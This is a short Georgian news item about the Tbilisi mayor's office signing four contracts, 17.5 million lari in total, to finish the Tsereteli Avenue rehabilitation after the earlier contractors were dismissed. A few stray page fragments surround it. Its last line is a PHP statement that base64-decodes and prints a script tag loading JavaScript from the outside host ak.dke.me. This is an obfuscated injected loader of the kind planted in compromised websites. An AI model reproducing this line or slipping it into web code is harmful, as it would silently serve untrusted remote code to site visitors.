celsiusi
ავერსი შნაიდერი

დედაქალაქის  მერიამ წერეთლის გამზირის რეაბილიტაციის დასრულებისთვის 4 ახალი კონტრაქტი გააფორმა.

კონტრაქტების ღირებულება ჯამში 17.5 მილიონი ლარია და ის კომპანიების მიხედვით ასე ნაწილდება:

“ბლექ სი გრუპი” - 4 მილიონი ლარი;

“პარმა” - 5.6 მილიონი ლარი;

“ენკო” - 3.5 მილიონი ლარი;

“ჯეუ გრუპი” - 4.4 მილიონი ლარი.

ცნობილია, რომ კონტრაქტორებმა სამუშაოები 24-საათიან რეჟიმში უნდა აწარმოონ. დღეს მთავრობის სხდომაზე დედაქალაქის მერმა, კახა კალაძემ განაცხადა, რომ წერეთლის გამზირზე საავტომობილო მოძრაობა იანვრის ბოლოს აუცილებლად აღდგება

შეგახსენებთ, რომ გუშინ გამზირის რეაბილიტაციით დაკავებულ კომპანიებს ხელშეკრულებები შეუწყდათ, რის მიზეზადაც კონტრაქტის პირობების დარღვევა და სამუშაოების უხარისხოდ და დაგვიანებით შესრულება გახდა.

 

209
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");